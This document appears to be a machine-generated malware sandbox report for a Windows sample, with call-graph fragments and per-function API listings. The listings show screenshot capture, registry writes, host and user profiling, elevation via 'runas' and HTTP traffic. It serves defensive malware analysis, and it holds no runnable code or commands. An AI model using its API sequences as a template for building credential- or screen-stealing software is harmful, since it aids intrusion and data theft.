41a2f3 16954->16956 16957 41a304 16954->16957 16981 419831 16955->16981 16958 41a69f __dosmaperr 6 API calls 16956->16958 16987 419f50 16957->16987 16958->16955 16961->16940 16963 419831 _free 12 API calls 16963->16961 16992 41a4a3 16964->16992 16966 41a67c 16967 41a685 16966->16967 16968 41a697 TlsGetValue 16966->16968 16967->16943 16970 41a4a3 __dosmaperr 5 API calls 16969->16970 16971 41a6bb 16970->16971 16972 41a2b4 16971->16972 16973 41a6d9 TlsSetValue 16971->16973 16972->16961 16974 41dfbf 16972->16974 16979 41dfcc __dosmaperr 16974->16979 16975 41e00c 16977 416437 __dosmaperr 13 API calls 16975->16977 16976 41dff7 HeapAlloc 
16978 41e00a 16976->16978 16976->16979 16977->16978 16978->16949 16979->16975 16979->16976 16980 417f1d __dosmaperr 2 API calls 16979->16980 16980->16979 16982 41983c HeapFree 16981->16982 16986 419865 __dosmaperr 16981->16986 16983 419851 16982->16983 16982->16986 16984 416437 __dosmaperr 12 API calls 16983->16984 16985 419857 GetLastError 16984->16985 16985->16986 16986->16961 17005 419de4 16987->17005 16993 41a4d1 16992->16993 16997 41a4cd __dosmaperr 16992->16997 16993->16997 16998 41a3dc 16993->16998 16996 41a4eb GetProcAddress 16996->16997 16997->16966 17003 41a3ed ___vcrt_InitializeCriticalSectionEx 16998->17003 16999 41a498 16999->16996 16999->16997 17000 41a40b LoadLibraryExW 17001 41a426 GetLastError 17000->17001 17000->17003 17001->17003 17002 41a481 FreeLibrary 17002->17003 17003->16999 17003->17000 17003->17002 17004 41a459 LoadLibraryExW 17003->17004 17004->17003 17006 419df0 ___scrt_is_nonwritable_in_current_image 17005->17006 17019 419123 EnterCriticalSection 17006->17019 17008 419dfa 17020 419e2a 17008->17020 17011 419ef6 17012 419f02 ___scrt_is_nonwritable_in_current_image 17011->17012 17024 419123 EnterCriticalSection 17012->17024 17014 419f0c 17025 41a0d7 17014->17025 17016 419f24 17029 419f44 17016->17029 17019->17008 17023 41916b LeaveCriticalSection 17020->17023 17022 419e18 17022->17011 17023->17022 17024->17014 17026 41a10d __fassign 17025->17026 17027 41a0e6 __fassign 17025->17027 17026->17016 17027->17026 17032 41fd5b 17027->17032 17106 41916b LeaveCriticalSection 17029->17106 17031 419f32 17031->16963 17033 41fddb 17032->17033 17036 41fd71 17032->17036 17035 419831 _free 14 API calls 17033->17035 17058 41fe29 17033->17058 17037 41fdfd 17035->17037 17036->17033 17040 419831 _free 14 API calls 17036->17040 17042 41fda4 17036->17042 17038 419831 _free 14 API calls 17037->17038 17041 41fe10 17038->17041 17039 41fe37 17048 41fe97 17039->17048 17050 419831 14 API calls _free 17039->17050 17044 41fd99 17040->17044 17045 419831 _free 14 API 
calls 17041->17045 17046 419831 _free 14 API calls 17042->17046 17059 41fdc6 17042->17059 17043 419831 _free 14 API calls 17047 41fdd0 17043->17047 17060 41f938 17044->17060 17053 41fdbb 17046->17053 17054 419831 _free 14 API calls 17047->17054 17050->17039 17088 41fa36 17053->17088 17054->17033 17100 41fecc 17058->17100 17059->17043 17061 41f949 17060->17061 17087 41fa32 17060->17087 17062 41f95a 17061->17062 17063 419831 _free 14 API calls 17061->17063 17063->17062 17087->17042 17089 41fa43 17088->17089 17090 41fa9b 17088->17090 17090->17059 17101 41fed9 17100->17101 17102 41fef8 17100->17102 17101->17102 17103 41fad7 __fassign 14 API calls 17101->17103 17102->17039 17104 41fef2 17103->17104 17106->17031 17108 418f89 17107->17108 17109 418f97 17107->17109 17108->17109 17114 418fae 17108->17114 17110 416437 __dosmaperr 14 API calls 17109->17110 17111 418f9f 17110->17111 17119 417ea2 17111->17119 17113 418fa9 17113->16933 17114->17113 17115 416437 __dosmaperr 14 API calls 17114->17115 17115->17111 17117 419831 _free 14 API calls 17116->17117 17118 4179af 17117->17118 17118->16934 17122 417e3e 17119->17122 17121 417eae 17121->17113 17123 41a279 __dosmaperr 14 API calls 17122->17123 17124 417e49 17123->17124 17125 417e57 17124->17125 17130 417ecf IsProcessorFeaturePresent 17124->17130 17125->17121 17127 417ea1 17128 417e3e __wsopen_s 25 API calls 17127->17128 17129 417eae 17128->17129 17129->17121 17131 417edb 17130->17131 17134 417cf6 17131->17134 17135 417d12 ___scrt_fastfail 17134->17135 17136 417d3e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17135->17136 17137 417e0f ___scrt_fastfail 17136->17137 17140 4139d2 17137->17140 17139 417e2d GetCurrentProcess TerminateProcess 17139->17127 17141 4139db 17140->17141 17142 4139dd IsProcessorFeaturePresent 17140->17142 17141->17139 17144 413a1f 17142->17144 17147 4139e3 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17144->17147 17146 413b02 17146->17139 
17147->17146 17149 417f56 ___scrt_is_nonwritable_in_current_image 17148->17149 17154 419123 EnterCriticalSection 17149->17154 17151 417f61 17155 417f9d 17151->17155 17154->17151 17158 41916b LeaveCriticalSection 17155->17158 17157 417f28 17157->16892 17158->17157 17164 412e29 17159->17164 17162 413b86 Concurrency::cancel_current_task RaiseException 17163 412f09 17162->17163 17167 412d9f 17164->17167 17168 413b04 ___std_exception_copy 26 API calls 17167->17168 17169 412dcb 17168->17169 17169->17162 17171 413178 17170->17171 17172 41317f 17170->17172 17176 418973 17171->17176 17179 4189df 17172->17179 17175 40191b 17177 4189df 28 API calls 17176->17177 17178 418985 17177->17178 17178->17175 17182 418715 17179->17182 17183 418721 ___scrt_is_nonwritable_in_current_image 17182->17183 17190 419123 EnterCriticalSection 17183->17190 17185 41872f 17191 418770 17185->17191 17187 41873c 17201 418764 17187->17201 17190->17185 17192 41878c 17191->17192 17194 418803 __dosmaperr 17191->17194 17193 4187e3 17192->17193 17192->17194 17204 41f4db 17192->17204 17193->17194 17196 41f4db 28 API calls 17193->17196 17194->17187 17198 4187f9 17196->17198 17197 4187d9 17199 419831 _free 14 API calls 17197->17199 17200 419831 _free 14 API calls 17198->17200 17199->17193 17200->17194 17239 41916b LeaveCriticalSection 17201->17239 17203 41874d 17203->17175 17205 41f503 17204->17205 17206 41f4e8 17204->17206 17210 41f512 17205->17210 17213 42461c 17205->17213 17206->17205 17207 41f4f4 17206->17207 17208 416437 __dosmaperr 14 API calls 17207->17208 17212 41f4f9 ___scrt_fastfail 17208->17212 17220 42464f 17210->17220 17212->17197 17214 424627 17213->17214 17215 42463c HeapSize 17213->17215 17216 416437 __dosmaperr 14 API calls 17214->17216 17215->17210 17217 42462c 17216->17217 17218 417ea2 __wsopen_s 25 API calls 17217->17218 17219 424637 17218->17219 17219->17210 17221 424667 17220->17221 17222 42465c 17220->17222 17224 42466f 17221->17224 17230 424678 __dosmaperr 17221->17230 17232 419d1a 
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023C1
                                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023E9
                                                                                • RegCloseKey.KERNEL32(?,?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023F2
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000001,00000000,000F003F,?), ref: 004024D9
                                                                                • RegSetValueExA.KERNEL32(80000001,?,00000000,00000001,?,?), ref: 00402507
                                                                                • RegCloseKey.ADVAPI32(80000001), ref: 00402510
                                                                                • GdiplusStartup.GDIPLUS(?,?,00000000,?,?,?), ref: 0040261B
                                                                                • GetDC.USER32(00000000), ref: 00402702
                                                                                • RegGetValueA.ADVAPI32(80000002,?,00000000,00000018,00000000,?,00000004), ref: 00402934
                                                                                • GetSystemMetrics.USER32 ref: 00402977
                                                                                • GetSystemMetrics.USER32 ref: 00402984
                                                                                • RegGetValueA.ADVAPI32(80000002,?,00000000,00000018,00000000,?,00000004), ref: 004029C9
                                                                                • GetSystemMetrics.USER32 ref: 00402A06
                                                                                • GetSystemMetrics.USER32 ref: 00402A13
                                                                                • CreateCompatibleDC.GDI32(?), ref: 00402A1C
                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00402A2E
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00402A3B
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,?), ref: 00402A5B
                                                                                • GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,00000010), ref: 00402A6F
                                                                                • GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 00402A8B
                                                                                • GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 00402AB2
                                                                                • GdipSaveImageToFile.GDIPLUS(00000000,?,?,00000000), ref: 00402B3D
                                                                                • SelectObject.GDI32(00000000,?), ref: 00402B47
                                                                                • DeleteObject.GDI32(00000000), ref: 00402B54
                                                                                • DeleteObject.GDI32(?), ref: 00402B59
                                                                                • ReleaseDC.USER32 ref: 00402B60
                                                                                • GdipDisposeImage.GDIPLUS(00000000), ref: 00402B67
                                                                                • GdiplusShutdown.GDIPLUS(?), ref: 00402BEC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Gdip$ImageMetricsObjectSystemValue$Create$BitmapCloseCompatibleDeleteEncodersGdiplusOpenSelect$DisposeFileFromQueryReleaseSaveShutdownSizeStartup
                                                                                • String ID: B9CB95C7A17F76$BF92619262$image/jpeg
                                                                                • API String ID: 406439762-201665791
                                                                                • Opcode ID: da2e381cba87a9605bac58802247654183988af180270529bf3738f7760e3346
                                                                                • Instruction ID: 66f73b8d5c6259ecd1855038438daf41d162fabdd216e9d7ef4dc30fd7a02504
                                                                                • Opcode Fuzzy Hash: da2e381cba87a9605bac58802247654183988af180270529bf3738f7760e3346
                                                                                • Instruction Fuzzy Hash: F1622B31A002049BEF18DF64CD89BEDBB76EF45304F50816DF805A72C5DBB99A85CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00404B50: GetVersionExW.KERNEL32(0000011C,?,76C86490), ref: 00404BA7
                                                                                  • Part of subcall function 00405230: GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00405286
                                                                                • IsUserAnAdmin.SHELL32 ref: 0040F230
                                                                                  • Part of subcall function 00402150: RegOpenKeyExA.KERNEL32(?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023C1
                                                                                  • Part of subcall function 00402150: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023E9
                                                                                  • Part of subcall function 00402150: RegCloseKey.KERNEL32(?,?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023F2
                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 0040F2B3
                                                                                • GetComputerNameExW.KERNEL32(00000002,?,?,?,?,?), ref: 0040F3B5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: NameUserVersion$AdminCloseComputerOpenQueryValue
                                                                                • String ID: 31f5cd$425620883392$89C3A39F$89C3A79F$89C49A9F$89C69E9F$89CEA79F$89D1A49F$89D2949F$89D5959F$89D79F9F$89D8A49F$96906292$CCC66E
                                                                                • API String ID: 3335310882-2138744902
                                                                                • Opcode ID: c29f51bd262eba5ef4b63da8da75613b1bf171c78fe3e062c76727c336a480f4
                                                                                • Instruction ID: cb416ccc8d4420a903fbb3b55177e7287d68d7c58012d2f00f8f6b9c9a0f1f54
                                                                                • Opcode Fuzzy Hash: c29f51bd262eba5ef4b63da8da75613b1bf171c78fe3e062c76727c336a480f4
                                                                                • Instruction Fuzzy Hash: 1BA23A71A001544BEB28DB28CD897DDBA32AF85305F1082EDE409A73D6DB7D9BC48F59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                APIs
                                                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00402C7A
                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00402C8F
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00402C92
                                                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00402CA0
                                                                                • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00402CC3
                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00402CCE
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00402CD1
                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00402CE1
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00402CE4
                                                                                • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00402D0E
                                                                                • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00402D21
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00402E15
                                                                                • HeapFree.KERNEL32(00000000), ref: 00402E1E
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402E23
                                                                                • HeapFree.KERNEL32(00000000), ref: 00402E26
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402E2D
                                                                                • HeapFree.KERNEL32(00000000), ref: 00402E30
                                                                                • LocalFree.KERNEL32(00000000), ref: 00402E35
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                                • String ID:
                                                                                • API String ID: 3326663573-0
                                                                                • Opcode ID: bbf60ad73f4f0b1907d464343105196cf1363c4575f22fb86427151020379b51
                                                                                • Instruction ID: 1f2fa1d56028b28db954e0c145b467a995226bc7c5205bb4d9c734eff09e26a8
                                                                                • Opcode Fuzzy Hash: bbf60ad73f4f0b1907d464343105196cf1363c4575f22fb86427151020379b51
                                                                                • Instruction Fuzzy Hash: 37519271A00209AFDB15DFA5DD88BEFBB78EF44304F10416AE905B3281DB749E45CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • InternetOpenW.WININET(00431D60,00000000,00000000,00000000,00000000), ref: 00407FF9
                                                                                • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00408018
                                                                                • HttpOpenRequestA.WININET(?,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00408062
                                                                                • HttpSendRequestA.WININET(?,?,?), ref: 00408109
                                                                                • InternetReadFile.WININET(?,?,000003FF,?), ref: 00408194
                                                                                • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 0040820F
                                                                                • InternetCloseHandle.WININET(?), ref: 0040822D
                                                                                • InternetCloseHandle.WININET(?), ref: 00408232
                                                                                • InternetCloseHandle.WININET(?), ref: 00408237
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                                                                                • String ID: B3B184B6
                                                                                • API String ID: 1354133546-1388886651
                                                                                • Opcode ID: c49c2f5116abc487cc915d3f080b49d4f91dc6cac6a430ff664894b7f12783d7
                                                                                • Instruction ID: 509f89d8c49d1ab15b1404276eb16bb215d4ddd1b2d399db649dd0bff0d0c643
                                                                                • Opcode Fuzzy Hash: c49c2f5116abc487cc915d3f080b49d4f91dc6cac6a430ff664894b7f12783d7
                                                                                • Instruction Fuzzy Hash: 79C1D571A00108ABEB14DF68CE85BDE7F75EF85304F50416EF854A72D1DB399A81CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                • W. Europe Standard Time, xrefs: 00421C55
                                                                                • W. Europe Daylight Time, xrefs: 00421C84
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$InformationTimeZone
                                                                                • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                • API String ID: 597776487-986674615
                                                                                • Opcode ID: 9c3159670546a0fe67b2d26441b9da20980b020d80fce58056df49f2e6230c34
                                                                                • Instruction ID: f38ec92d3ba7eadd921b68df47be3c0e113c6c55f6444b1f6c7a3c9226a89f73
                                                                                • Opcode Fuzzy Hash: 9c3159670546a0fe67b2d26441b9da20980b020d80fce58056df49f2e6230c34
                                                                                • Instruction Fuzzy Hash: 42C16A75B00225ABCB249F39E841AEF7BB99F61314FA440AFE44197361E7389E42C75C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00403641
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040366C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteObjectShellSingleWait
                                                                                • String ID: <$@$runas
                                                                                • API String ID: 1289292659-2740324054
                                                                                • Opcode ID: 935c6bd0f5e5bbab709afb2f715ab91a81bf0dc936774632f78b90df3b7c683d
                                                                                • Instruction ID: f76b77160053bb3da01766da26ea8cecf252af4cc75a26f3f6749614eddad15e
                                                                                • Opcode Fuzzy Hash: 935c6bd0f5e5bbab709afb2f715ab91a81bf0dc936774632f78b90df3b7c683d
                                                                                • Instruction Fuzzy Hash: EA914671200340ABDB14CF38C98579E7FA6AF89345F508A2EF845973D5D779CA80CB89
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00405286
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004052E5
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004052EC
                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 00405384
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                                                                                • String ID:
                                                                                • API String ID: 2167034304-0
                                                                                • Opcode ID: 91d46fb5c63d7810cc1c93e9f46c2e96aaac53c8b74b388684e82267ff8761de
                                                                                • Instruction ID: ba48a37b2361c0dd3631c2fdc5f6a64bfbfb4d374eb9e537ce3d947d4bdeb76a
                                                                                • Opcode Fuzzy Hash: 91d46fb5c63d7810cc1c93e9f46c2e96aaac53c8b74b388684e82267ff8761de
                                                                                • Instruction Fuzzy Hash: 3E414B70D102089BEB24ABA8DD4A7DEBB75EF45314F4042BEEC00A73C1E77959908BD9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_000137A4,0041329D), ref: 0041379D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: a518e237032a73c671d6fe6900a11de7500ab0f4a1156549394890eacbd6c240
                                                                                • Instruction ID: 29b736cd0aea69f67f96c391f878fa58e36a5c9e8a9fb7f159d6dd889a0d47bc
                                                                                • Opcode Fuzzy Hash: a518e237032a73c671d6fe6900a11de7500ab0f4a1156549394890eacbd6c240
                                                                                • Instruction Fuzzy Hash:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00420AE0: CreateFileW.KERNEL32(00000000,00000000,?,00420ED0,?,?,00000000,?,00420ED0,00000000,0000000C), ref: 00420AFD
                                                                                • GetLastError.KERNEL32 ref: 00420F3B
                                                                                • __dosmaperr.LIBCMT ref: 00420F42
                                                                                • GetFileType.KERNEL32(00000000), ref: 00420F4E
                                                                                • GetLastError.KERNEL32 ref: 00420F58
                                                                                • __dosmaperr.LIBCMT ref: 00420F61
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00420F81
                                                                                • CloseHandle.KERNEL32(004196CE), ref: 004210CE
                                                                                • GetLastError.KERNEL32 ref: 00421100
                                                                                • __dosmaperr.LIBCMT ref: 00421107
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                • String ID: H
                                                                                • API String ID: 4237864984-2852464175
                                                                                • Opcode ID: cf2c77a3dcd128d6262446101434c1499272d8e768c7107bd87c34c7b8fea853
                                                                                • Instruction ID: a9c50e62fe1c003193422340030df6aa95307796f034396d39d73d8aaaa7654f
                                                                                • Opcode Fuzzy Hash: cf2c77a3dcd128d6262446101434c1499272d8e768c7107bd87c34c7b8fea853
                                                                                • Instruction Fuzzy Hash: 49A11832A001648FCF199F68EC51BAE3BE1AF0A314F55415EE8119B3A2CB399952C759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(0000011C,?,76C86490), ref: 00404BA7
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00404C02
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00404C09
                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 00404CA5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                                                                                • String ID: 95926298$9592629B$95926394
                                                                                • API String ID: 2167034304-2671370521
                                                                                • Opcode ID: 1bc9c3ce626455d54f6b2ef3673fe7f3083b5da37f7654282b6bdefa6a322e13
                                                                                • Instruction ID: df0449e883439d51ed97f444c0669631ee7618f66d79eebbc547106e60d973ea
                                                                                • Opcode Fuzzy Hash: 1bc9c3ce626455d54f6b2ef3673fe7f3083b5da37f7654282b6bdefa6a322e13
                                                                                • Instruction Fuzzy Hash: BC025870E001045BEB18EB68DD4679E7B62EF85304F1042BEE804AB3C2DB7D99918BD9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread$Sleep
                                                                                • String ID: 425620883392
                                                                                • API String ID: 422425972-3676216964
                                                                                • Opcode ID: 84479cd2be450617f04c1c4ccab801caacb737e1f520803fa0aed91cd58afb33
                                                                                • Instruction ID: 16c40b164f5f579ecfa07685f58cedde3b5f8f59123f0b16dc075b3e10425f12
                                                                                • Opcode Fuzzy Hash: 84479cd2be450617f04c1c4ccab801caacb737e1f520803fa0aed91cd58afb33
                                                                                • Instruction Fuzzy Hash: 51D17C71F001042BEB18B778DD86BDD7E229B82314F20821EE515AB3E6E77D69C1879D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0042F678), ref: 00421BE6
                                                                                • _free.LIBCMT ref: 00421BD4
                                                                                  • Part of subcall function 00419831: HeapFree.KERNEL32(00000000,00000000,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?), ref: 00419847
                                                                                  • Part of subcall function 00419831: GetLastError.KERNEL32(?,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?,?), ref: 00419859
                                                                                • _free.LIBCMT ref: 00421DA0
                                                                                Strings
                                                                                • W. Europe Standard Time, xrefs: 00421C55
                                                                                • W. Europe Daylight Time, xrefs: 00421C84
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                                                                • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                • API String ID: 2155170405-986674615
                                                                                • Opcode ID: 7f923c14f9b7e4efb6f64e0be5ccfc421e4ae72419d5372e6a4208f577db8cfa
                                                                                • Instruction ID: 80643e636257d3479dfb1524777211dc6722e7f82ab559556bc9aab89ca9d8e1
                                                                                • Opcode Fuzzy Hash: 7f923c14f9b7e4efb6f64e0be5ccfc421e4ae72419d5372e6a4208f577db8cfa
                                                                                • Instruction Fuzzy Hash: 4B513B75E00225ABCB24EF76EC829AE77B8EF50314B51417BE411932A1D7389E418B5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00415AA5), ref: 00415B95
                                                                                • GetFileInformationByHandle.KERNEL32(?,?), ref: 00415BEF
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00415AA5,?,000000FF,00000000,00000000), ref: 00415C7D
                                                                                • __dosmaperr.LIBCMT ref: 00415C84
                                                                                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00415CC1
                                                                                  • Part of subcall function 00415EE9: __dosmaperr.LIBCMT ref: 00415F1E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                • String ID:
                                                                                • API String ID: 1206951868-0
                                                                                • Opcode ID: c7c8139b11d71a24d1e1d36783f63ebfc4138adef9335a36e0eccf54d198dcc5
                                                                                • Instruction ID: 88099238f6437060bc531c8437f52590096e2779159099ed49765dd9aa7e6e7d
                                                                                • Opcode Fuzzy Hash: c7c8139b11d71a24d1e1d36783f63ebfc4138adef9335a36e0eccf54d198dcc5
                                                                                • Instruction Fuzzy Hash: 4B414C71900B04EFDB249FA5D8459EBBBF9EF88300B10452EF456D3610E738A981DB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep__fread_nolock
                                                                                • String ID: D5C4$DAC4
                                                                                • API String ID: 1389363356-3923605705
                                                                                • Opcode ID: b1f8e113cd360cd512c5eb5ecd93998473f27a1182f6125da232745281f5236f
                                                                                • Instruction ID: 144cbdfc09b04aa5b0f32bee2e9876f8eb8738b4994396107350e652fdcba953
                                                                                • Opcode Fuzzy Hash: b1f8e113cd360cd512c5eb5ecd93998473f27a1182f6125da232745281f5236f
